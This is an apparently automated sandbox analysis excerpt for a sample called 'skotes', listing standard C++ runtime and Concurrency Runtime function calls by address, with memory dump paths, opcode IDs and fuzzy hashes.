                                                                                                                                              • Instruction Fuzzy Hash: 8271BC70A00249AFDF15DF54CA80BBFBBB1AF49308F04509AEC416B352C7B9AD16DB65
                                                                                                                                              APIs
                                                                                                                                              • Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 00422876
                                                                                                                                              • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 004228DF
                                                                                                                                              • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 00422913
                                                                                                                                                • Part of subcall function 004207ED: Concurrency::details::ResourceManager::AffinityRestriction::ApplyAffinityLimits.LIBCMT ref: 0042080D
                                                                                                                                              • Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 00422993
                                                                                                                                              • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 004229DB
                                                                                                                                                • Part of subcall function 004207C2: Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 004207DE
                                                                                                                                              • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 004229EF
                                                                                                                                              • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 00422A00
                                                                                                                                              • Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 00422A4D
                                                                                                                                              • Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 00422A7E
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Concurrency::details::Manager::Resource$Affinity$Apply$Restrictions$InformationTopology$Restriction::$CleanupFindGroupLimits
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1321587334-0
                                                                                                                                              • Opcode ID: 9abd196dbe3760ed533f204942a39c663444424dc11bb6fb8cf1de85ffcec6e8
                                                                                                                                              • Instruction ID: e80cf76bb90d4b83ff5cf9a0939ff877604985d568bc9a9fcea241cccaa3ebda
                                                                                                                                              • Opcode Fuzzy Hash: 9abd196dbe3760ed533f204942a39c663444424dc11bb6fb8cf1de85ffcec6e8
                                                                                                                                              • Instruction Fuzzy Hash: 0481BF71B00526ABCB18DF69FA9057EB7F1BB48704B94403ED441A3741EBB8A981CB9D
                                                                                                                                              APIs
                                                                                                                                              • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00426A1F
                                                                                                                                              • Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 00426A51
                                                                                                                                              • List.LIBCONCRT ref: 00426A8C
                                                                                                                                              • Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 00426A9D
                                                                                                                                              • Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 00426AB9
                                                                                                                                              • List.LIBCONCRT ref: 00426AF4
                                                                                                                                              • Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 00426B05
                                                                                                                                              • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00426B20
                                                                                                                                              • List.LIBCONCRT ref: 00426B5B
                                                                                                                                              • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 00426B68
                                                                                                                                                • Part of subcall function 00425EDF: Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00425EF7
                                                                                                                                                • Part of subcall function 00425EDF: Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00425F09
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Concurrency::details::Scheduling$Find$GroupNode::ProcessorRing::ScheduleSegmentVirtual$ListNext$AcquireConcurrency::details::_Lock::_ReaderWriteWriter
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3403738998-0
                                                                                                                                              • Opcode ID: 49fcf71f40cdee32d76cff0cfec7904b1821ee1dee631ce0987f33fef910e908
                                                                                                                                              • Instruction ID: 579499c82c18d5a5ade90e723c63f8c40f3c28f02b2f1580fedc01109288aa91
                                                                                                                                              • Opcode Fuzzy Hash: 49fcf71f40cdee32d76cff0cfec7904b1821ee1dee631ce0987f33fef910e908
                                                                                                                                              • Instruction Fuzzy Hash: 9C516170B00229ABDB04DF65D495BEEB7A8FF08304F45406EE915EB381DB78AE45CB94
                                                                                                                                              APIs
                                                                                                                                              • IsInExceptionSpec.LIBVCRUNTIME ref: 004353A0
                                                                                                                                              • type_info::operator==.LIBVCRUNTIME ref: 004353C7
                                                                                                                                              • ___TypeMatch.LIBVCRUNTIME ref: 004354D3
                                                                                                                                              • IsInExceptionSpec.LIBVCRUNTIME ref: 004355AE
                                                                                                                                              • CallUnexpected.LIBVCRUNTIME ref: 00435650
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ExceptionSpec$CallMatchTypeUnexpectedtype_info::operator==
                                                                                                                                              • String ID: csm$csm$csm
                                                                                                                                              • API String ID: 4162181273-393685449
                                                                                                                                              • Opcode ID: a333619f4898329af32b3d93ce64bfd70127bcb43ac65579a31d58dbbafa8e18
                                                                                                                                              • Instruction ID: 7946f23dea792be26d4820a62e4550dff79cbb7357508b3bf55c7f92dc133849
                                                                                                                                              • Opcode Fuzzy Hash: a333619f4898329af32b3d93ce64bfd70127bcb43ac65579a31d58dbbafa8e18
                                                                                                                                              • Instruction Fuzzy Hash: C3C1AA71800609EFCF19DF95C881AAEBBB5BF1C315F04615BE8156B206C338EA51CF99
                                                                                                                                              APIs
                                                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00434877
                                                                                                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 0043487F
                                                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00434908
                                                                                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 00434933
                                                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00434988
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                              • String ID: S9C$csm
                                                                                                                                              • API String ID: 1170836740-582408667
                                                                                                                                              • Opcode ID: f50a35cc9b0cd1d54b3ada07bdb3590510d73737303dcd081f3ff4d5673c6e04
                                                                                                                                              • Instruction ID: 6575625a84691e9b1f9b7e8611f910fc559112cced3487189da3a48804891882
                                                                                                                                              • Opcode Fuzzy Hash: f50a35cc9b0cd1d54b3ada07bdb3590510d73737303dcd081f3ff4d5673c6e04
                                                                                                                                              • Instruction Fuzzy Hash: 7141E874A00208ABCF10DF69C844ADF7BB4BF89318F14815BE8149B392D779EA11CF99
                                                                                                                                              APIs
                                                                                                                                              • Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCONCRT ref: 004273B0
                                                                                                                                              • Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCONCRT ref: 004273F2
                                                                                                                                              • Concurrency::details::InternalContextBase::GetAndResetOversubscribedVProc.LIBCMT ref: 0042740E
                                                                                                                                              • Concurrency::details::VirtualProcessor::MarkForRetirement.LIBCONCRT ref: 00427419
                                                                                                                                              • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00427440
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Concurrency::details::$Virtual$FindMatchingNode::ProcessorScheduling$Base::ContextInternalMarkOversubscribedProcProcessor::ResetRetirementstd::invalid_argument::invalid_argument
                                                                                                                                              • String ID: count$ppVirtualProcessorRoots
                                                                                                                                              • API String ID: 3897347962-3650809737
                                                                                                                                              • Opcode ID: 458ac73997a2f70f37004ddd16129de3859d25f13cf3a168d1a694e5b8c776cb
                                                                                                                                              • Instruction ID: 910b0151320ec7fd7557316ad521234f334c06ab70371bbe18cdfb5d61862d5e
                                                                                                                                              • Opcode Fuzzy Hash: 458ac73997a2f70f37004ddd16129de3859d25f13cf3a168d1a694e5b8c776cb
                                                                                                                                              • Instruction Fuzzy Hash: A8219334B00229EFCB10EF55D485AAEBBB5BF09344F54406AEC0197351CB38AE05CB98
                                                                                                                                              APIs
                                                                                                                                              • _SpinWait.LIBCONCRT ref: 0041EEBC
                                                                                                                                              • Concurrency::details::WaitBlock::WaitBlock.LIBCMT ref: 0041EEC8
                                                                                                                                              • Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 0041EEE1
                                                                                                                                              • Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 0041EF0F
                                                                                                                                              • Concurrency::Context::Block.LIBCONCRT ref: 0041EF31
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Wait$BlockConcurrency::details::_Lock::_Scoped_lock$Block::Concurrency::Concurrency::details::Context::ReaderReentrantScoped_lock::_Scoped_lock::~_SpinWriter
                                                                                                                                              • String ID: iA
                                                                                                                                              • API String ID: 1182035702-1118743441
                                                                                                                                              • Opcode ID: 44bd3080b73c1477e3e77adc034eaf94d8acea1012cb4d9343d720ce2a986297
                                                                                                                                              • Instruction ID: dbfce4fa691d0a98bc3aa8749e6742a9d80362ff2df78e67c0c5db40cb0b6eee
                                                                                                                                              • Opcode Fuzzy Hash: 44bd3080b73c1477e3e77adc034eaf94d8acea1012cb4d9343d720ce2a986297
                                                                                                                                              • Instruction Fuzzy Hash: 1321F374C002099ADF24DFA6C4456EEB7F0FF14324F10052FE851A22C1E7B84AC6CB48
                                                                                                                                              APIs
                                                                                                                                              • Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 00427903
                                                                                                                                                • Part of subcall function 00425CB8: __EH_prolog3_catch.LIBCMT ref: 00425CBF
                                                                                                                                                • Part of subcall function 00425CB8: Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 00425CF8
                                                                                                                                              • Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 0042792A
                                                                                                                                              • Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 00427936
                                                                                                                                                • Part of subcall function 00425CB8: Concurrency::details::SchedulerBase::AddContext.LIBCONCRT ref: 00425D70
                                                                                                                                                • Part of subcall function 00425CB8: Concurrency::details::InternalContextBase::SpinUntilBlocked.LIBCMT ref: 00425D7E
                                                                                                                                              • Concurrency::details::SchedulerBase::GetNextSchedulingRing.LIBCMT ref: 00427982
                                                                                                                                              • Concurrency::location::_Assign.LIBCMT ref: 004279A3
                                                                                                                                              • Concurrency::details::SchedulerBase::StartupVirtualProcessor.LIBCONCRT ref: 004279AB
                                                                                                                                              • Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 004279BD
                                                                                                                                              • Concurrency::details::SchedulerBase::ChangeThrottlingTimer.LIBCONCRT ref: 004279ED
                                                                                                                                                • Part of subcall function 0042691D: Concurrency::details::SchedulerBase::FoundAvailableVirtualProcessor.LIBCONCRT ref: 00426942
                                                                                                                                                • Part of subcall function 0042691D: Concurrency::details::VirtualProcessor::ClaimTicket::ExerciseWith.LIBCMT ref: 00426965
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000005.00000002.3346052698.0000000000681000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346881863.0000000000682000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3347843501.0000000000683000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3348907952.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.000000000068C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.00000000006CA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3351570636.00000000006F4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3352270174.00000000006F5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353013061.00000000006F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353390429.00000000006FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353567936.00000000006FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353855620.000000000070B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353897524.000000000070C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353939926.000000000070D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353978674.000000000070E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Concurrency::details::$Base::$Scheduler$ContextThrottling$InternalTimeVirtual$Processor$AssignAvailableBlockedChangeClaimConcurrency::location::_ExerciseFoundH_prolog3_catchNextProcessor::RingSchedulingSpinStartupTicket::TimerUntilWith
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1475861073-0
                                                                                                                                              • Opcode ID: e5f6ca3cbb7375102534bb9ce9f7030bf6bb821756b29020f3f95bdaa7addcda
                                                                                                                                              • Instruction ID: be26d28973ab40e19276e1e39a9ed43843e9869f42fe47dc141d3d43563d5587
                                                                                                                                              • Opcode Fuzzy Hash: e5f6ca3cbb7375102534bb9ce9f7030bf6bb821756b29020f3f95bdaa7addcda
                                                                                                                                              • Instruction Fuzzy Hash: 9F314670B083715AEF16AA7854927FF77B59F01304F4401ABD485D7342DA2C4D8AC3D9
                                                                                                                                              APIs
                                                                                                                                              • __alloca_probe_16.LIBCMT ref: 00444C98
                                                                                                                                              • __alloca_probe_16.LIBCMT ref: 00444D5E
                                                                                                                                              • __freea.LIBCMT ref: 00444DCA
                                                                                                                                                • Part of subcall function 0043B04B: RtlAllocateHeap.NTDLL(00000000,EBA58D57,?,?,0041D3FC,EBA58D57,?,00417A8B,?,?,?,?,?,?,00407465,?), ref: 0043B07E
                                                                                                                                              • __freea.LIBCMT ref: 00444DD3
                                                                                                                                              • __freea.LIBCMT ref: 00444DF6
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                                                                                                              • String ID: ZC,mC
                                                                                                                                              • API String ID: 1423051803-3499607563
                                                                                                                                              • Opcode ID: 1f817f6d5ac6458dcc7bc62f3b6682248ba7d3e94ffd72069e84dbc94cae19ff
                                                                                                                                              • Instruction ID: 3df8754f567642f5bc12b9c6ac1686bc91f11376b98a6e44c20c24ac8824f300
                                                                                                                                              • Opcode Fuzzy Hash: 1f817f6d5ac6458dcc7bc62f3b6682248ba7d3e94ffd72069e84dbc94cae19ff
                                                                                                                                              • Instruction Fuzzy Hash: 1651D5B2A00216ABFB255F55DC81FBB36A9DFC4754F15012BFD0497251EB38DC1186A8
                                                                                                                                              APIs
                                                                                                                                              • Concurrency::details::UMS::CreateUmsCompletionList.LIBCONCRT ref: 0042DD91
                                                                                                                                              • Concurrency::details::InternalContextBase::ExecutedAssociatedChore.LIBCONCRT ref: 0042DDAE
                                                                                                                                              • Concurrency::details::InternalContextBase::WorkWasFound.LIBCONCRT ref: 0042DE14
                                                                                                                                              • Concurrency::details::InternalContextBase::ExecuteChoreInline.LIBCMT ref: 0042DE29
                                                                                                                                              • Concurrency::details::InternalContextBase::WaitForWork.LIBCONCRT ref: 0042DE3B
                                                                                                                                              • Concurrency::details::InternalContextBase::CleanupDispatchedContextOnCancel.LIBCMT ref: 0042DE4B
                                                                                                                                              • Concurrency::details::UMS::GetCurrentUmsThread.LIBCONCRT ref: 0042DE74
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000005.00000002.3334212055.000000000065E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3336247440.000000000065F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3337715504.0000000000662000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3338866773.0000000000669000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3340778400.000000000066A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3341774303.0000000000671000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342394644.0000000000673000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342875922.000000000067B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344228340.000000000067F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344851185.0000000000680000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346052698.0000000000681000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346881863.0000000000682000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3347843501.0000000000683000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3348907952.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.000000000068C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.00000000006CA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3351570636.00000000006F4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3352270174.00000000006F5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353013061.00000000006F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353390429.00000000006FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353567936.00000000006FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353855620.000000000070B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353897524.000000000070C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353939926.000000000070D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353978674.000000000070E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Concurrency::details::$Context$Base::Internal$ChoreWork$AssociatedCancelCleanupCompletionCreateCurrentDispatchedExecuteExecutedFoundInlineListThreadWait
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2885714658-0
                                                                                                                                              • Opcode ID: 5ad63c1b420a2bf52cb8b3588fb72bc2c3132c889c9b7eb879e497c126c90066
                                                                                                                                              • Instruction ID: f1fabc8e0c887fbee8e2ec9558ce6889dd68099345497c82765e1d73775b2d10
                                                                                                                                              • Opcode Fuzzy Hash: 5ad63c1b420a2bf52cb8b3588fb72bc2c3132c889c9b7eb879e497c126c90066
                                                                                                                                              • Instruction Fuzzy Hash: 4E41BC70F146649ADF14EBA1A4557ED77616F11308F9444AFE8416B3C3DB3C8E08C76A
                                                                                                                                              APIs
                                                                                                                                              • Concurrency::details::InternalContextBase::ReclaimVirtualProcessor.LIBCONCRT ref: 0042E7D7
                                                                                                                                                • Part of subcall function 0042E544: Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 0042E577
                                                                                                                                                • Part of subcall function 0042E544: Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 0042E599
                                                                                                                                              • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 0042E854
                                                                                                                                              • Concurrency::details::ScheduleGroupSegmentBase::ReleaseInternalContext.LIBCMT ref: 0042E860
                                                                                                                                              • Concurrency::details::SchedulerBase::TriggerCommitSafePoints.LIBCMT ref: 0042E86F
                                                                                                                                              • Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 0042E879
                                                                                                                                              • Concurrency::location::_Assign.LIBCMT ref: 0042E8AD
                                                                                                                                              • Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 0042E8B5
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Concurrency::details::$Base::$Context$Virtual$DeactivateGroupInternalProcessorProcessor::ScheduleSchedulerSegment$ActiveAssignCommitConcurrency::location::_EventPointsReclaimReleaseRunnableSafeTraceTrigger
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1924466884-0
                                                                                                                                              • Opcode ID: 68357d3375aa4ffdda60a85fea681dfadbeefaeb1374d27128ca733c89973d16
                                                                                                                                              • Instruction ID: 01245f0547eb729828e98329900f8f6e173d559f1909e94d2917f6101dcd408e
                                                                                                                                              • Opcode Fuzzy Hash: 68357d3375aa4ffdda60a85fea681dfadbeefaeb1374d27128ca733c89973d16
                                                                                                                                              • Instruction Fuzzy Hash: 19415A39A00214EFCF00EF65D484AADB7B5FF48314F5480AAED499B382DB34A941CB95
                                                                                                                                              APIs
                                                                                                                                              • __Mtx_unlock.LIBCPMT ref: 00416ED1
                                                                                                                                              • std::_Rethrow_future_exception.LIBCPMT ref: 00416F22
                                                                                                                                              • std::_Rethrow_future_exception.LIBCPMT ref: 00416F32
                                                                                                                                              • __Mtx_unlock.LIBCPMT ref: 00416FD5
                                                                                                                                              • __Mtx_unlock.LIBCPMT ref: 004170DB
                                                                                                                                              • __Mtx_unlock.LIBCPMT ref: 00417116
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Mtx_unlock$Rethrow_future_exceptionstd::_
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1997747980-0
                                                                                                                                              • Opcode ID: 7508702b337ab969c6590127fd2fafe911626255f2fd8f5798ca8ecfb8570e48
                                                                                                                                              • Instruction ID: d5c402bd19617442db253326e825c470d249229bcec99b7fb150ec4f877a8494
                                                                                                                                              • Opcode Fuzzy Hash: 7508702b337ab969c6590127fd2fafe911626255f2fd8f5798ca8ecfb8570e48
                                                                                                                                              • Instruction Fuzzy Hash: D2C1E171904304ABDB20DFA5C945BEBBBF4AF04314F00456FE81697782EB79A984CB65
                                                                                                                                              APIs
                                                                                                                                              • ListArray.LIBCONCRT ref: 00424538
                                                                                                                                              • ListArray.LIBCONCRT ref: 0042456C
                                                                                                                                              • Hash.LIBCMT ref: 004245D5
                                                                                                                                              • Hash.LIBCMT ref: 004245E5
                                                                                                                                                • Part of subcall function 00429C41: std::bad_exception::bad_exception.LIBCMT ref: 00429C63
                                                                                                                                              • Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 0042474B
                                                                                                                                              • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004247A4
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ArrayHashList$AsyncConcurrency::details::Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorLibraryLoadRegisterTimerstd::bad_exception::bad_exception
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3010677857-0
                                                                                                                                              • Opcode ID: 6747c3f020f8ef4684df3661ce965c4fe51d99b9457fe3ff0820a4c8cc41837c
                                                                                                                                              • Instruction ID: ec33403de420fa8dbb884c2c9f58a99fdecbbdfef48a172bda59dab9b4b19e20
                                                                                                                                              • Opcode Fuzzy Hash: 6747c3f020f8ef4684df3661ce965c4fe51d99b9457fe3ff0820a4c8cc41837c
                                                                                                                                              • Instruction Fuzzy Hash: 77817DB0B11A22BBD708DF759441BD9FAA8BF49704F50421FE42897281CBB8A564CBD5
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _strrchr
                                                                                                                                              • String ID: vC
                                                                                                                                              • API String ID: 3213747228-1921080006
                                                                                                                                              • Opcode ID: c90ae3db66b5619743134332522a0b96de832b73a835be1452314c5289bd2e52
                                                                                                                                              • Instruction ID: 8cae4ceb00b15cc6f8fe4719d8afecb37dc1afbf88934ae700027118ad1b5c75
                                                                                                                                              • Opcode Fuzzy Hash: c90ae3db66b5619743134332522a0b96de832b73a835be1452314c5289bd2e52
                                                                                                                                              • Instruction Fuzzy Hash: DEB1F3329046459FEB15CF28C8C27AEBBA5EF49344F24916BE855FB341D6389D02CB68
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: __alloca_probe_16__freea
                                                                                                                                              • String ID: ejD
                                                                                                                                              • API String ID: 1635606685-1610536573
                                                                                                                                              • Opcode ID: 47d47bb1d6f3ad21345524b87fac94c3602762f5b7532853514cf9a3da8184e6
